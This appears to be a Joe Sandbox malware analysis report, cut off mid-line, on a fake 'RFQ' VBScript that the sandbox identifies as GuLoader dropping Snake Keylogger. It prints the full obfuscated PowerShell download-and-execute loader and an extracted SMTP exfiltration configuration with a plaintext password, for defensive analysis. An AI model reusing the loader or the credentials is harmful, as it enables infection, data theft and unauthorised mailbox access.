Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U8a62#U50f9 (RFQ) -RFQ20241010.vbs

Overview

General Information

Sample name:#U8a62#U50f9 (RFQ) -RFQ20241010.vbs
renamed because original name is a hash value
Original sample name: (RFQ) -RFQ20241010.vbs
Analysis ID:1530594
MD5:1720cb49814844901b663405cb868b7d
SHA1:fcc41b466e5f919f302ab92bf5305b7ee3cce8b6
SHA256:45395d14e4f88f3cdda6fef5f6c62c885faa538cf6c057fd4ac5de8ba876b706
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7436 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swankpot=(Hjlpeprster 'Victo$ Kns.G GenelCyanoOserpebChaffATriviLDepla:UnderhTrichUBadelmAutokrPegaiFPleocoMoth,rOpbrulBundtA Ga,nDSyn aTBalde2Skole0Gener6Krteg=SkribNDi tceBran w Unfa-ProleODish bPa acjSni,sEKo ancAktiotDulc DivasvejfoYRigh sObnouTHunknEMisgoMSoodl.Unc mn etste Delit,yele.Pro eWPruneePladsB,uahuC Vejrl StatiRoyniETicktnElectt gulp ');Snoose ($Swankpot);Snoose (Hjlpeprster 'Irrec$ uperHMyriauSparrmKlinkr hokfCock oPege rKinemlN tteaNedkodTheoltM ssa2 Tils0aboun6Abra .SaphaH Prole SortaMensedGalabeBlrebrAlpehsBukke[Knled$Stin EInterrSco,cy soustGrundhGookbrGodaro eriscGoersyReliktAn.iqeFus.osVagte] K ns=Unpoe$DamasWHemo eTitreaForsrkDrag l FilmyDispo ');$Tilbedendes=Hjlpeprster ' Tele$Se.ulHMat auTodimm S ytrFinanfSuperoC.intrG naelPrimoaTalpidSin.nt Sk v2 t lp0Semig6 efl. PearD SpaloTilbawLnninnInt rlSammeoSp,ciaBesrgdHemerF ExhaiUnivelFripoeanthi( Tele$ orsBFreeleSmrreh DrilaAkt evAr eai.omocoCykeluUnvirrAks ei,habasRe lutMnst , Hksa$ B stJBy aaeNu,lew andeEpigolstounlPampheAzoter Hea,iBogkaeParodsKvadr)Endem ';$Jewelleries=$Hildede;Snoose (Hjlpeprster 'Libe,$AsperGPani L Sk.vOEk.trbetikeASlvsml E,il:Aargas ,amuK R stR SparIpennyn SkriL FortGMobilGNonageU pron In.eDCh sme SinoSWeakf=schn (P cketPla teSkobrsH.pertCon e-DybdepN uroaIchthTDeepwhMeini Sa fu$AntenJDataoEAmortw BrygeBambuLLo.nslNotesED,scoRIncomiApoteE .yposPubli)Alber ');while (!$Skrinlggendes) {Snoose (Hjlpeprster ' Pe g$Filthg njurl SomnoMonstb Arrya,eraflBromv: gfoHGriffo MetamMa,asiUph altegn.e lmut Outlisu,ersMedrikSeedn1Att c3Gross5 npu=r.alt$ isemt ImoerUnconu Non eLo.me ') ;Snoose $Tilbedendes;Snoose (Hjlpeprster ' EnddsTeknoTVegetaIggieRSgereTTrste- Hepts VigelBogfoe.solieI dfjPF,stb Si.ds4Laane ');Snoose (Hjlpeprster 'beslu$T turG owerlFant OElemebLea eAEncloLSup,r:RealisSemiakUnknorDeliliBryssNParall noppG Par gTamaseDomicnCressd abbErumstsFisk,=Fi bl(BesigT CwtsEEthy.SJu,elTloghe-RetsvPSkraaasa antVelgrHSprin colo$fa,iljUnderE ReabwUnraiE KommL Gtt,lGymnaeNonguRPrenaIForhaeUndersEntwi) Huck ') ;Snoose (Hjlpeprster 'Jawbo$NiveaGEctodL unitO ammebTabbyA SygelH ars: OdonwHovedaEjendlLysseeEjendD Turk8Kniks8Reorg=Occul$ IchtGNy aaLBolstO kamBXerodaTork.l Mace:U.addBCamaliPartilGr,ffLLigniOOmlssw Daae+Stedv+ Regu%Slgts$ finglMunk,sSkrfeB P.oul aberAStigsDNonseeTilra2 ang5Chair4 Tr n.TurisCUlig.OVinnau litenHushoTOverr ') ;$Behaviourist=$Lsblade254[$Waled88];}$Chlorinity144=319932;$Gldesls=31552;Snoose (Hjlpeprster 'Shi l$ ForbgSlsomLRoypoo UdstBGynanApaaa LRheop:ktternClockOcabreNLangbepe talRouleEDisemc AptstFatl,OSolidrd.epa Flyv=Cysto Fingg GlobeudsprtD,kan-PrunecHekseO PresnMeni tGalanEshakenEpi,eTBheng D.ton$ MeckJStkkeEStyesW Lab eProd.l SiliLDoedee KrearFe,eriSveinEF steSStifi ');Snoose (Hjlpeprster 'Morde$CrossgGy pelPar.uoc,ugabTildkaArb.jlSkraa:TouseSAbonnl Ra,gySgenanOversgH,arslDeta eAlludrFostrnLozene uart ontr=C rpo Del c[ Hau S Sluty FasasOldwitGiolieQuadem Solo.SkftnCTekstoVarianSinkevBarb.eFrijar,riestMorge]Ta.ef: Matt:BandsFKollar I,proPor rmGhe.tB Som,aI paksIndgre jemf6Afh g4 ErodS.ettitOksekrInteri SrsynSkr,dgPl gg(Bly.n$unporNOm ipoSenion She,eSelvslFlirteCalc cI spht versoB urtr Flde) Clea ');Snoose (Hjlpeprster 'Seri,$ConfiG Udk l .ndeo FlinBPipleaArbitlSmarm: RgelsDiploa ClerNVandoOCoc sPHereaU,bsfaRAs heUJeblilFredses nhenSpkkeTHusli Besov=Kompl Uncom[Man isSagtmyFst.gsFaktuTMetise nigoMBeg e.D.scrTP ankeEnkelXUn,ovTEtypi.StalaeGenklNVict.CLnregoCentrdDesi i.minknmordeGLa db]Caper: Akti:rufgaAFdselS S abcGum,oIReno.iSi.di.SplutG RebeeSka kt .azaSUndisTDiftor AgtsIBrudfNPrecog Spr,(grdes$KollasBastaL A miy Th.nn.nbelGPrivaLSermoeA falrAfspnnVagabE Inly)Mue d ');Snoose (Hjlpeprster 'Lengt$ FlorgRoyallH.rnbO HuedbMar,ia CentLPisse:EveryHOppr.a PreegPani IThoraOCables b nncAnmelo UdmupR,gboEOutbe=Se.im$Hens,sRegreaBasguNMasseo.enisP brugUReprsRSagfrUMastuLLilleeD ismNRe ixtGia t.SammeSaflukUBondeBUnders T egtNotanRaskebI nabn NavngCheck(Min.a$ ilieC.pareHUnmerlInte.o Re urTe evi,denonS,tieIVr ltt Cal,yUnsil1Aflev4 K.eb4S nkt,Etrus$,vrgrg For,LRapi DQuieteP,rvisUdkl LH,mats Bar ) herm ');Snoose $Hagioscope;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8036 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdiSP.ece1Lakke2resor ');$Behaviourist=$Lsblade254[0];$Swankpot=(Hjlpeprster 'Victo$ Kns.G GenelCyanoOserpebChaffATriviLDepla:UnderhTrichUBadelmAutokrPegaiFPleocoMoth,rOpbrulBundtA Ga,nDSyn aTBalde2Skole0Gener6Krteg=SkribNDi tceBran w Unfa-ProleODish bPa acjSni,sEKo ancAktiotDulc DivasvejfoYRigh sObnouTHunknEMisgoMSoodl.Unc mn etste Delit,yele.Pro eWPruneePladsB,uahuC Vejrl StatiRoyniETicktnElectt gulp ');Snoose ($Swankpot);Snoose (Hjlpeprster 'Irrec$ uperHMyriauSparrmKlinkr hokfCock oPege rKinemlN tteaNedkodTheoltM ssa2 Tils0aboun6Abra .SaphaH Prole SortaMensedGalabeBlrebrAlpehsBukke[Knled$Stin EInterrSco,cy soustGrundhGookbrGodaro eriscGoersyReliktAn.iqeFus.osVagte] K ns=Unpoe$DamasWHemo eTitreaForsrkDrag l FilmyDispo ');$Tilbedendes=Hjlpeprster ' Tele$Se.ulHMat auTodimm S ytrFinanfSuperoC.intrG naelPrimoaTalpidSin.nt Sk v2 t lp0Semig6 efl. PearD SpaloTilbawLnninnInt rlSammeoSp,ciaBesrgdHemerF ExhaiUnivelFripoeanthi( Tele$ orsBFreeleSmrreh DrilaAkt evAr eai.omocoCykeluUnvirrAks ei,habasRe lutMnst , Hksa$ B stJBy aaeNu,lew andeEpigolstounlPampheAzoter Hea,iBogkaeParodsKvadr)Endem ';$Jewelleries=$Hildede;Snoose (Hjlpeprster 'Libe,$AsperGPani L Sk.vOEk.trbetikeASlvsml E,il:Aargas ,amuK R stR SparIpennyn SkriL FortGMobilGNonageU pron In.eDCh sme SinoSWeakf=schn (P cketPla teSkobrsH.pertCon e-DybdepN uroaIchthTDeepwhMeini Sa fu$AntenJDataoEAmortw BrygeBambuLLo.nslNotesED,scoRIncomiApoteE .yposPubli)Alber ');while (!$Skrinlggendes) {Snoose (Hjlpeprster ' Pe g$Filthg njurl SomnoMonstb Arrya,eraflBromv: gfoHGriffo MetamMa,asiUph altegn.e lmut Outlisu,ersMedrikSeedn1Att c3Gross5 npu=r.alt$ isemt ImoerUnconu Non eLo.me ') ;Snoose $Tilbedendes;Snoose (Hjlpeprster ' EnddsTeknoTVegetaIggieRSgereTTrste- Hepts VigelBogfoe.solieI dfjPF,stb Si.ds4Laane ');Snoose (Hjlpeprster 'beslu$T turG owerlFant OElemebLea eAEncloLSup,r:RealisSemiakUnknorDeliliBryssNParall noppG Par gTamaseDomicnCressd abbErumstsFisk,=Fi bl(BesigT CwtsEEthy.SJu,elTloghe-RetsvPSkraaasa antVelgrHSprin colo$fa,iljUnderE ReabwUnraiE KommL Gtt,lGymnaeNonguRPrenaIForhaeUndersEntwi) Huck ') ;Snoose (Hjlpeprster 'Jawbo$NiveaGEctodL unitO ammebTabbyA SygelH ars: OdonwHovedaEjendlLysseeEjendD Turk8Kniks8Reorg=Occul$ IchtGNy aaLBolstO kamBXerodaTork.l Mace:U.addBCamaliPartilGr,ffLLigniOOmlssw Daae+Stedv+ Regu%Slgts$ finglMunk,sSkrfeB P.oul aberAStigsDNonseeTilra2 ang5Chair4 Tr n.TurisCUlig.OVinnau litenHushoTOverr ') ;$Behaviourist=$Lsblade254[$Waled88];}$Chlorinity144=319932;$Gldesls=31552;Snoose (Hjlpeprster 'Shi l$ ForbgSlsomLRoypoo UdstBGynanApaaa LRheop:ktternClockOcabreNLangbepe talRouleEDisemc AptstFatl,OSolidrd.epa Flyv=Cysto Fingg GlobeudsprtD,kan-PrunecHekseO PresnMeni tGalanEshakenEpi,eTBheng D.ton$ MeckJStkkeEStyesW Lab eProd.l SiliLDoedee KrearFe,eriSveinEF steSStifi ');Snoose (Hjlpeprster 'Morde$CrossgGy pelPar.uoc,ugabTildkaArb.jlSkraa:TouseSAbonnl Ra,gySgenanOversgH,arslDeta eAlludrFostrnLozene uart ontr=C rpo Del c[ Hau S Sluty FasasOldwitGiolieQuadem Solo.SkftnCTekstoVarianSinkevBarb.eFrijar,riestMorge]Ta.ef: Matt:BandsFKollar I,proPor rmGhe.tB Som,aI paksIndgre jemf6Afh g4 ErodS.ettitOksekrInteri SrsynSkr,dgPl gg(Bly.n$unporNOm ipoSenion She,eSelvslFlirteCalc cI spht versoB urtr Flde) Clea ');Snoose (Hjlpeprster 'Seri,$ConfiG Udk l .ndeo FlinBPipleaArbitlSmarm: RgelsDiploa ClerNVandoOCoc sPHereaU,bsfaRAs heUJeblilFredses nhenSpkkeTHusli Besov=Kompl Uncom[Man isSagtmyFst.gsFaktuTMetise nigoMBeg e.D.scrTP ankeEnkelXUn,ovTEtypi.StalaeGenklNVict.CLnregoCentrdDesi i.minknmordeGLa db]Caper: Akti:rufgaAFdselS S abcGum,oIReno.iSi.di.SplutG RebeeSka kt .azaSUndisTDiftor AgtsIBrudfNPrecog Spr,(grdes$KollasBastaL A miy Th.nn.nbelGPrivaLSermoeA falrAfspnnVagabE Inly)Mue d ');Snoose (Hjlpeprster 'Lengt$ FlorgRoyallH.rnbO HuedbMar,ia CentLPisse:EveryHOppr.a PreegPani IThoraOCables b nncAnmelo UdmupR,gboEOutbe=Se.im$Hens,sRegreaBasguNMasseo.enisP brugUReprsRSagfrUMastuLLilleeD ismNRe ixtGia t.SammeSaflukUBondeBUnders T egtNotanRaskebI nabn NavngCheck(Min.a$ ilieC.pareHUnmerlInte.o Re urTe evi,denonS,tieIVr ltt Cal,yUnsil1Aflev4 K.eb4S nkt,Etrus$,vrgrg For,LRapi DQuieteP,rvisUdkl LH,mats Bar ) herm ');Snoose $Hagioscope;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4504 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "hardware@esteem.com.my", "Password": "PI%m)}2pZn6r", "Host": "mail.esteem.com.my", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.1739244674.00000000086B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000006.00000002.1750338876.000000000D2B9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_7620.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_8036.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc7d9:$b2: ::FromBase64String(
              • 0xb85c:$s1: -join
              • 0x110bd:$s3: Reverse
              • 0x5008:$s4: +=
              • 0x50ca:$s4: +=
              • 0x92f1:$s4: +=
              • 0xb40e:$s4: +=
              • 0xb6f8:$s4: +=
              • 0xb83e:$s4: +=
              • 0x15cfb:$s4: +=
              • 0x15d7b:$s4: +=
              • 0x15e41:$s4: +=
              • 0x15ec1:$s4: +=
              • 0x16097:$s4: +=
              • 0x1611b:$s4: +=
              • 0xc07e:$e4: Get-WmiObject
              • 0xc26d:$e4: Get-Process
              • 0xc2c5:$e4: Start-Process
              • 0x1696a:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs", ProcessId: 7436, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.186.142, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4504, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49969
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs", ProcessId: 7436, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage 